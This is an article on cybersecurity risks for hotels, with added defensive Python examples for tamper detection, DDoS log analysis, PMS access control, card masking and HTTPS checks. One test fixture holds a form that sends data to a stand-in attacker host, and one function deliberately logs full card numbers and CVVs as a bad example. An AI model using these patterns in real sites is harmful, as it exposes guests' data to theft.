Hotel Digital Alert: The Security Headaches of Hoteliers

A Survival Guide to the digital world of the contemporary hotel


By John Giannatos

The concept of hotels and accommodation goes back a long way, well before the thermal baths of the ancient Greeks or the mansions that hosted travellers on government business in ancient Rome. In all those centuries the business changed only slightly. It was the arrival of the internet that changed the whole setting, and with it the way the "product" is bought.
This change came as a shock to hoteliers who lacked the knowledge and background needed to manage such complex issues. The vocabulary of the modern hotelier has been enriched with over 500 new technical terms.

Up to now, hoteliers have tried to seize every opportunity to increase their sales and get all they could out of the new medium. What they did not take into account were the many risks involved, and the infrastructure required to create a genuinely secure digital marketplace.
Most investment chases profit, while security and the digital infrastructure behind it are neglected.
Things may have worked this way so far, but that is about to change for good. The sum of money circulating in the accommodation industry keeps growing, and in the near future cybercrime will be knocking on the hotelier's door.
Let's take a closer look at the Achilles heel of the hospitality industry. Could there be more than one?

Domain Names

Domain names are among the most important assets of your hotel, so they should be registered to the hotel itself and not to a third party. Web design companies often buy the domain name on behalf of a hotel and then keep it registered in their own name. That exposes you to the agency's staff as well: imagine the registrar credentials for your hotel's domain posted anonymously to dozens of forums by a disgruntled employee of the web design company that, with good intentions at the time, bought the domain for you. Check the WHOIS record: the registrant and administrative contacts should be the hotel, the domain should be locked against transfer, and renewal notices should reach a mailbox the hotel controls.

Hosting & Security

In terms of security this is a choice of crucial importance, since the operation of the website and of the hotel's e-mail depends entirely on the reliability and quality of service of the hosting provider.


The soft version
Attackers gain access to your website (the most common case today) and change your keywords so that you lose your search ranking.
They insert hidden text linking to bad websites so that Google's algorithm blacklists you, and again you lose your ranking.
They tamper with the geolocation script that serves content according to the visitor's location. You keep seeing your site as it is, while users in the UK see: "Unfortunately, due to renovation our hotel is closed for the next two months".
They change robots.txt from "allow" to "disallow", and as a result you disappear from the search engines.
They change the e-mail recipient of your contact form, or add a second recipient that you do not control.
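The tampering described above is easy to detect if you check your own site regularly. The following is an added example, not code from the article: it scans a page for hidden links, changed meta keywords and a changed contact-form action or recipient, checks robots.txt for a site-wide disallow, and compares the visible text of the same page fetched from several locations to catch geo-cloaking. The function names, the expected baseline values and the sample pages are all constructed for the example.

```python
# Added example, not part of the article: an integrity check for the tampering
# patterns listed above. It assumes the hotel keeps a baseline (expected keywords
# and contact-form action) and fetches its own pages from several locations.
# All HTML and robots.txt inputs below are constructed samples, not real pages.
import hashlib
import re
from html.parser import HTMLParser

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0", re.I)
VOID_TAGS = {"meta", "link", "img", "br", "hr", "input"}
RECIPIENT_FIELDS = {"recipient", "to", "email_to", "mailto"}  # classic form-mailer fields


class PageScan(HTMLParser):
    """Collects hidden links, meta keywords, form actions and mail-recipient fields."""

    def __init__(self):
        super().__init__()
        self.hidden_depth = []   # one bool per open element: inside a hidden subtree?
        self.hidden_links, self.form_actions, self.recipients, self.meta = [], [], [], {}

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        inside_hidden = self.hidden_depth[-1] if self.hidden_depth else False
        hidden = inside_hidden or bool(HIDDEN_STYLE.search(a.get("style", "")))
        if tag == "a" and "href" in a and hidden:
            self.hidden_links.append(a["href"])
        elif tag == "meta" and a.get("name"):
            self.meta[a["name"].lower()] = a.get("content", "")
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "hidden" \
                and a.get("name", "").lower() in RECIPIENT_FIELDS:
            self.recipients.append(a.get("value", ""))
        if tag not in VOID_TAGS:
            self.hidden_depth.append(hidden)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if self.hidden_depth:
            self.hidden_depth.pop()


def robots_blocks_all(robots_txt):
    """True if the 'User-agent: *' group of robots.txt contains 'Disallow: /'."""
    applies, prev_was_ua = False, False
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            applies = (applies and prev_was_ua) or value == "*"
            prev_was_ua = True
            continue
        prev_was_ua = False
        if key == "disallow" and applies and value == "/":
            return True
    return False


def text_fingerprint(html):
    """Hash of the visible text, for comparing one page fetched from different locations."""
    text = re.sub(r"<script.*?</script>|<style.*?</style>", " ", html, flags=re.S | re.I)
    text = " ".join(re.sub(r"<[^>]+>", " ", text).split())
    return hashlib.sha256(text.encode()).hexdigest()


def cloaked_locations(fetches):
    """fetches: {location: html}. Locations whose visible text differs from the majority."""
    hashes = {loc: text_fingerprint(h) for loc, h in fetches.items()}
    majority = max(set(hashes.values()), key=list(hashes.values()).count)
    return sorted(loc for loc, h in hashes.items() if h != majority)


def audit_page(html, robots_txt, expected_keywords, expected_form_action):
    """Return the list of tampering indicators found (empty list means clean)."""
    scan = PageScan()
    scan.feed(html)
    findings = []
    if scan.meta.get("keywords", "") != expected_keywords:
        findings.append("keywords_changed")
    if scan.hidden_links:
        findings.append("hidden_links")
    if any(action != expected_form_action for action in scan.form_actions):
        findings.append("form_action_changed")
    if scan.recipients:
        findings.append("form_recipient_in_html")
    if robots_blocks_all(robots_txt):
        findings.append("robots_disallow_all")
    return findings


# --- constructed samples (not real pages) ---
CLEAN_HTML = """<html><head><meta name="keywords" content="hotel, athens, sea view"></head>
<body><h1>Hotel Example</h1><p>Rooms with sea view.</p>
<form action="/contact" method="post"><input type="text" name="msg"></form></body></html>"""
TAMPERED_HTML = """<html><head><meta name="keywords" content="cheap pills, casino"></head>
<body><h1>Hotel Example</h1><p>Rooms with sea view.</p>
<div style="display:none"><a href="http://bad.example/pills">pills</a></div>
<form action="http://evil.example/collect" method="post">
<input type="hidden" name="recipient" value="attacker@evil.example"></form></body></html>"""
CLEAN_ROBOTS = "User-agent: *\nDisallow: /admin/\n"
TAMPERED_ROBOTS = "User-agent: *\nDisallow: /\n"
```

Run the audit from a machine outside the hotel, and fetch the page from more than one country (or with different Accept-Language headers) before comparing fingerprints; a cloaked page looks perfectly normal from the hotelier's own desk.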

The hardcore version
Attackers who break into the control panel of your hosting account can create forwarders on the hotel's official e-mail addresses and silently monitor all your correspondence with clients for years (reservation details, credit cards and so on). They can then create an address such as [email protected] and send newsletters in your hotel's name.
Imagine your hotel making the headlines: "Thousands of personal details and credit card numbers lost due to poor security practices at Hotel X".
In that worst case, lawsuits by customers could be disastrous for both the hotel's finances and its reputation.

Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks

This is the name for attacks on a network or server whose aim is to make a computer or a service unable to accept further connections. It is one of the frontline tools of online conflict, and here the target is the server that hosts your hotel website.
In a distributed attack, the attackers use many compromised "zombie" computers around the world, usually infected with a Trojan, to target a single system. The victims of a DDoS attack are both the targeted system and all the systems the attacker has hijacked and controls to carry out the attack.
Because the flood of traffic comes from many different sources, potentially thousands of zombie computers, the attack cannot be stopped simply by blocking a single IP address.
Your hotel website is an online shop that sells rooms, and nothing matters more than a web host that stays up 24/7. Ask your host what DDoS protection it provides (upstream filtering, or a content delivery network in front of the site), be alert to the signs of an attack, and never underestimate what loose ends can do to your business.
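The point that blocking one address does not help against a distributed flood can be seen in the web server's own access log. The following is an added example, not code from the article: it groups requests into ten-second windows and reports both the single addresses that exceed a per-IP limit and the windows whose total exceeds an aggregate limit. The log lines are constructed (using the RFC 5737 documentation address ranges), and the limits are assumptions chosen for the example.

```python
# Added example, not part of the article: a rate check over web-server access
# logs showing why per-IP blocking stops a single-source flood but not a
# distributed one. All log lines are constructed samples, not real traffic.
import re
from collections import Counter, defaultdict
from datetime import datetime, timezone

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[^"]*" \d{3} \d+')
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """(ip, timestamp) for a Common/Combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FORMAT)


def rate_report(lines, window_s=10, per_ip_limit=20, total_limit=200):
    """Bucket requests into fixed windows; flag (a) single IPs above per_ip_limit and
    (b) windows whose total exceeds total_limit even when no single IP stands out."""
    per_window = defaultdict(Counter)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue            # skip lines that do not parse rather than crash
        ip, ts = parsed
        per_window[int(ts.timestamp()) // window_s * window_s][ip] += 1
    report = []
    for start in sorted(per_window):
        counts = per_window[start]
        total = sum(counts.values())
        report.append({
            "start": datetime.fromtimestamp(start, tz=timezone.utc).isoformat(),
            "total": total,
            "distinct_ips": len(counts),
            "per_ip_offenders": sorted(ip for ip, n in counts.items() if n > per_ip_limit),
            "aggregate_flood": total > total_limit,
        })
    return report


def sample_line(ip, second, path="/"):
    """Constructed log line in Apache/nginx 'combined' style (not real traffic)."""
    return (f'{ip} - - [10/Oct/2024:13:55:{second:02d} +0000] '
            f'"GET {path} HTTP/1.1" 200 512 "-" "Mozilla/5.0"')


SAMPLE_LOG = (
    # background traffic: two ordinary visitors
    [sample_line("192.0.2.10", s) for s in (1, 5, 22, 40)]
    + [sample_line("192.0.2.11", s, "/rooms") for s in (3, 25, 44)]
    # single-source flood: one IP, 50 requests within seconds 0-9
    + [sample_line("203.0.113.9", s % 10, "/booking") for s in range(50)]
    # distributed flood: 60 IPs, 5 requests each within seconds 20-24
    + [sample_line(f"198.51.100.{i}", 20 + k, "/booking") for i in range(1, 61) for k in range(5)]
)
```

In the first window the single flooding address shows up as an offender and can be blocked; in the second, every address stays under the per-IP limit and only the aggregate count reveals the attack, which is why mitigation has to happen upstream of the hotel's server.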

The PMS

The PMS coordinates the operations of your front office and handles a large amount of critical information about your hotel. To operate safely it must provide role-based access control, make user management easy, and let you specify which workstations may run the software at all. Not every employee of your hotel needs access to full customer records. Some PMS products also expose accounting and reporting data, which makes their access management all the more sensitive.
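What "role-based security" and "which machines are allowed" mean in practice is shown in the following added example, which is not code from the article or from any real PMS product. An action is allowed only if the role is entitled to it and the request comes from an approved workstation subnet, and each role sees only the fields of a guest record it needs. The roles, actions, subnets, field names and the guest record are all assumptions constructed for the example.

```python
# Added example, not part of the article or of any real PMS: a minimal
# role-based access check of the kind the paragraph asks for. Roles, actions,
# subnets and the record are assumptions constructed for the example.
import ipaddress

ROLE_ACTIONS = {
    "front_desk":   {"reservation.read", "reservation.write", "guest.read"},
    "housekeeping": {"room_status.read", "room_status.write"},
    "accounting":   {"reservation.read", "folio.read", "report.read"},
    "manager":      {"reservation.read", "reservation.write", "guest.read",
                     "folio.read", "report.read", "user.manage"},
}

# Workstations each role may use the PMS from (front office, housekeeping, back office).
ROLE_NETWORKS = {
    "front_desk":   ["10.10.1.0/24"],
    "housekeeping": ["10.10.2.0/24"],
    "accounting":   ["10.10.3.0/24"],
    "manager":      ["10.10.1.0/24", "10.10.3.0/24"],
}

# Guest-record fields each role may see. No role sees a full card number:
# the PMS should hold only a payment token and the last four digits.
ROLE_FIELDS = {
    "front_desk":   {"name", "room", "arrival", "departure", "card_last4", "id_document"},
    "housekeeping": {"room", "departure"},
    "accounting":   {"name", "room", "folio_balance", "card_last4", "payment_token"},
    "manager":      {"name", "room", "arrival", "departure", "folio_balance",
                     "card_last4", "payment_token", "id_document"},
}


def authorize(role, action, client_ip):
    """Allow only if the role has the action AND the request comes from an approved workstation."""
    if role not in ROLE_ACTIONS or action not in ROLE_ACTIONS[role]:
        return False
    addr = ipaddress.ip_address(client_ip)
    return any(addr in ipaddress.ip_network(net) for net in ROLE_NETWORKS[role])


def view_guest(role, record):
    """Return only the fields of the record the role is entitled to see."""
    allowed = ROLE_FIELDS.get(role, set())
    return {k: v for k, v in record.items() if k in allowed}


# Constructed guest record; the token is a placeholder, not a real processor token.
GUEST = {
    "name": "M. Papadopoulou", "room": "412", "arrival": "2024-10-10", "departure": "2024-10-14",
    "folio_balance": 640.00, "card_last4": "1111", "payment_token": "tok_example_placeholder",
    "id_document": "AB123456",
}
```

When evaluating a PMS, ask for exactly these three controls: per-role permissions, workstation (or network) restrictions, and field-level masking of card and identity data in the screens each role uses.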

The digital doors

The Card Version
At the Black Hat security conference in 2012, Cody Brocious, a Mozilla software developer, demonstrated a very cheap home-built device that could open millions of hotel room doors fitted with Onity key-card locks, by plugging it into the power port on the underside of the lock. The whole process takes about 200 milliseconds from plugging in the device to opening the door.

The Mobile Phone Version
A new service enables mobile phones to work as digital keys, replacing the traditional room key or card. Guests receive a secure key code on their smartphone and use it to unlock the door wirelessly. According to the Wall Street Journal, some Hilton hotels will allow doors to be unlocked with a smartphone from the beginning of 2015, with the global roll-out expected to be complete by the end of 2016.


These services are welcome as long as they make the guest's stay more enjoyable, but they also bring safety risks. We trust that Hilton's security standards have anticipated them. The problems will multiply when the service becomes available in every hotel: cheap offerings from companies that sprang up overnight will add yet another reason to worry about room safety.

If those systems are not fully secure, reviews will start appearing on social networks along the lines of: "Lack of security, our room was burgled during our stay". Things become far more serious in the extreme case where a guest's life is at risk.

The Wi-fi of your hotel

Providing free Wi-Fi is a good thing, but providing a public Wi-Fi that users can join anonymously is a different story altogether. Legislation is changing so that the hotel can know which guests are using its Wi-Fi, via login portals, Facebook logins and the like. No hotelier wants a terrorist attack launched from the hotel's public network without being able to identify the user. (Current EU legislation places the responsibility on the hotel's General Manager.)


Another threat to your guests is the man-in-the-middle attack. On an unsecured Wi-Fi network, anyone within range of the hotel's signal can potentially read the traffic sent over it. During their stay a guest has more than a 20% chance of buying another service online in the area, so the security of the hotel's internet access matters a great deal. The same applies to the hotel's internal network: an unsecured wireless network is the perfect gateway into the internal network of any business or organization, and you certainly do not want everyone to have access to the critical data of your hotel. At a minimum, keep the guest Wi-Fi on a separate network segment from the hotel's own systems, and enable client isolation on the access points so that guests cannot reach one another's devices.
Wi-Fi security has improved significantly in recent years. The weakest link, however, remains the hotelier who opts for cheaper services and equipment. It is up to hoteliers to set strict standards here.

The Booking Engine

The booking engine is the peak of the e-commerce pyramid in the contemporary hotel. It handles the largest, most important and most sensitive part of your dealings with visitors and clients. Attackers today have powerful tools at their disposal, so think twice before investing in a "cheap" booking engine. Know in advance that if things turn nasty, you will pay far more in the end.

Most booking engines now serve their pages over HTTPS, with a TLS (SSL) certificate and 256-bit encryption of the connection, so that users can feel safe handing over their card details.
That protects the card data only while it is in transit, however. What happens to it during and after the transaction is governed by the Payment Card Industry Data Security Standard (PCI DSS), a standard maintained by the card brands' PCI Security Standards Council.

PCI compliance means adherence to that set of security requirements, which were developed to protect card data during and after a financial transaction. It is an important property of a booking engine, yet only a few have it. It is also one of the prerequisites TripAdvisor sets for booking engines before they may accept online bookings directly.

A reservation made through a properly secured booking engine is safer than one made over the telephone, where the card number is read aloud and written down.

To save money, some hotels still build their own custom booking engine. Given the perils described so far, that is a bad and insecure idea.
EU, US and Australian rules on card data (PCI DSS and data-protection law) do not allow such data to be handled by a custom-made solution running in an insecure environment. It is illegal and dangerous.
Remember the newspaper headline and the social-media reviews mentioned above. Pursue positive media coverage only.
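What a home-made booking engine typically gets wrong is not the certificate but what it does with the card number afterwards: writing the full number and security code into logs, e-mails or the reservation table. The following is an added example, not code from the article or from any booking engine: the careless logging call is shown next to the hardened handling PCI DSS expects (the card number goes only to the payment gateway, the engine keeps a token and the last four digits, the security code is never stored), plus a log scrubber that finds Luhn-valid card numbers and masks them. The function names, the sample reservation and the gateway token are constructed for the example; 4111 1111 1111 1111 is a well-known test number, not a real card.

```python
# Added example, not from the article or any booking engine: the usual mistake of a
# home-made engine (full card number in a log) next to the hardened handling PCI DSS
# expects. Functions, field names and the sample reservation are constructed for the
# example; the gateway token is a placeholder, not a real processor token.
import re

# 13-19 digits, optionally separated by single spaces or dashes.
PAN_CANDIDATE = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")


def luhn_ok(digits):
    """Luhn checksum used by card numbers; filters out phone and reservation numbers."""
    if not digits.isdigit() or not 13 <= len(digits) <= 19:
        return False
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                       # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(digits):
    """PCI DSS masking rule: show at most the first six and the last four digits."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def scrub(text):
    """Replace every Luhn-valid card number in free text with its masked form."""
    def repl(m):
        digits = re.sub(r"[ -]", "", m.group(0))
        return mask_pan(digits) if luhn_ok(digits) else m.group(0)
    return PAN_CANDIDATE.sub(repl, text)


# --- the home-made way: full card number and security code end up in the log ---
def log_reservation_unsafe(res):
    return (f"booked {res['guest']} card {res['pan']} exp {res['expiry']} "
            f"cvv {res['cvv']} ref {res['ref']}")


# --- the hardened way: the card number goes only to the payment gateway ---
def sanitize_reservation(res, gateway_token):
    """Return the record the booking engine may store: no card number, no security
    code (PCI DSS forbids keeping it after authorisation), token plus last four only."""
    digits = re.sub(r"[ -]", "", res["pan"])
    kept = {k: v for k, v in res.items() if k not in ("pan", "cvv")}
    kept["card_last4"] = digits[-4:]
    kept["payment_token"] = gateway_token
    return kept


def log_reservation_safe(res, gateway_token):
    kept = sanitize_reservation(res, gateway_token)
    # scrub() is a second line of defence in case a full number slips into the text.
    return scrub(f"booked {kept['guest']} card ****{kept['card_last4']} ref {kept['ref']}")


# Constructed reservation; the card number is the standard Visa test number.
RESERVATION = {"guest": "Maria", "pan": "4111 1111 1111 1111", "expiry": "12/27",
               "cvv": "123", "ref": "1234567812345678"}
```

Note that the 16-digit reservation reference is left alone by the scrubber because it fails the Luhn check; a bare "any 16 digits" rule would mangle booking references and phone numbers while still missing nothing that matters.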

HTTPS Everywhere: Secure Sites by Default

Make your hotel website secure.
Large organizations such as the Electronic Frontier Foundation (together with the Tor Project) have created HTTPS Everywhere, a browser extension that switches the user to the encrypted version of a site wherever one is available. It is part of a global trend among the large internet organizations and the browser vendors towards all websites being secure (HTTPS) by default within the next few years.
Google already places great emphasis on HTTPS, so that users of Search, Gmail and Drive, for example, automatically get an encrypted connection to Google.

At its annual Google I/O 2014 event it urged webmasters to convert their sites to HTTPS, and it later announced on its official blog that HTTPS would become a (lightweight) ranking signal, in effect an SEO bonus for sites that use it.

Both major browsers, Chrome and Mozilla Firefox, have declared their intention to set a date in the near future after which HTTPS is treated as the norm and the user is warned whenever the page visited is not secure.
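Buying a certificate is only the first step; a site is "secure by default" only if plain-HTTP requests are redirected, the browser is told to stay on HTTPS (the Strict-Transport-Security header) and no script or image is still loaded over http://. The following is an added example, not code from the article: it evaluates the two responses a checker would get (one for the http:// address, one for the https:// address) against those three rules. The two response pairs are constructed, so the check runs without any network access, and the helper names are assumptions.

```python
# Added example, not from the article: checks that a site actually enforces HTTPS
# (redirects plain HTTP, sends HSTS with a long max-age, loads no content over
# http://). The responses are constructed samples; no network access is needed.
import re

ONE_YEAR = 365 * 24 * 3600
MIXED_SRC = re.compile(
    r"""<(?:script|iframe|img|link)\b[^>]*\b(?:src|href)\s*=\s*["']?(http://[^"'\s>]+)""", re.I)


def parse_hsts(value):
    """Parse a Strict-Transport-Security header value into its directives."""
    out = {"max-age": 0, "includesubdomains": False, "preload": False}
    for part in value.split(";"):
        k, _, v = part.strip().partition("=")
        k = k.strip().lower()
        if k == "max-age" and v.strip().isdigit():
            out["max-age"] = int(v)
        elif k in ("includesubdomains", "preload"):
            out[k] = True
    return out


def _headers(probe):
    return {k.lower(): v for k, v in probe.get("headers", {}).items()}


def assess_https(http_probe, https_probe):
    """http_probe/https_probe: {'status': int, 'headers': {...}, 'body': str}.
    Returns the list of problems found (empty list means the site passes)."""
    findings = []
    location = _headers(http_probe).get("location", "")
    if http_probe["status"] not in (301, 302, 307, 308) or not location.startswith("https://"):
        findings.append("http_not_redirected_to_https")
    hsts = _headers(https_probe).get("strict-transport-security")
    if hsts is None:
        findings.append("hsts_missing")
    elif parse_hsts(hsts)["max-age"] < ONE_YEAR:
        findings.append("hsts_max_age_too_short")
    for url in MIXED_SRC.findall(https_probe.get("body", "")):
        findings.append("mixed_content:" + url)
    return findings


# Constructed responses: a site that merely owns a certificate, and the same site fixed.
WEAK_HTTP = {"status": 200, "headers": {"Content-Type": "text/html"}, "body": "<html>Book now</html>"}
WEAK_HTTPS = {"status": 200, "headers": {"Content-Type": "text/html"},
              "body": '<html><head><script src="http://cdn.example/booking.js"></script></head>'
                      '<body>Book now</body></html>'}
FIXED_HTTP = {"status": 301, "headers": {"Location": "https://www.hotel.example/"}, "body": ""}
FIXED_HTTPS = {"status": 200,
               "headers": {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"},
               "body": '<html><head><script src="https://cdn.example/booking.js"></script></head>'
                       '<body>Book now</body></html>'}
```

The mixed-content finding is the one that catches most hotel sites after a migration: the booking widget or a map script is still referenced over http://, and the browser either blocks it or drops the padlock.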

The Human aspect

One of the biggest weaknesses in information security today is the human factor.
We have to deal not only with malicious actions but with honest mistakes too. It takes only a simple mistake by an untrained employee to leave a door open in your security, and most information security controls can be bypassed by careless or unaware employees or partners.

Hotels are now expected to provide information security awareness and education. Most regulations, industry requirements and new technologies call for some form of security awareness training for the hotel's staff.

Even those you trust should sign an NDA, so that if they later work for a competing hotel you can make sure your customer information and mailing lists remain at your disposal only. The same applies to every company that handles your hotel's data: NDAs should be signed between those companies and their own partners too, since an agreement between you and the firm has no power over employees who have since left it.

This article was not written only to protect you from your enemies but equally to warn you to watch your back with your friends. Most of the examples of bad practice I have collected come from hotels' dealings with web design and development companies that exploit the hotelier's ignorance of certain matters and their weakness for the "cheap" option. Before starting a collaboration, look closely at the company's reputation and history, the quality of the services it provides to other hotels, the retention rate of its employees, and so on.

None of the above is a science-fiction film; it is the digital daily routine. The more money the accommodation industry accumulates, the greater the perils will become.

This is a serious matter, and one worth investing money in. Work only with professionals and leave nothing to chance. Do not always choose the cheaper option; you get what you pay for. Cheap is cheap.

Opt for the partners that the hotel chains and large hotels choose. Research the market and ask for references on internet and technology matters before hiring an individual or a firm. The hotel is now an online store and requires maximum expertise and security in online transactions and sales. Competition is moving steadily into the digital environment, so digital know-how is what makes the difference.
Educate yourself as much as you can, and always clear up any question that arises by asking for more details about the security of each service and product.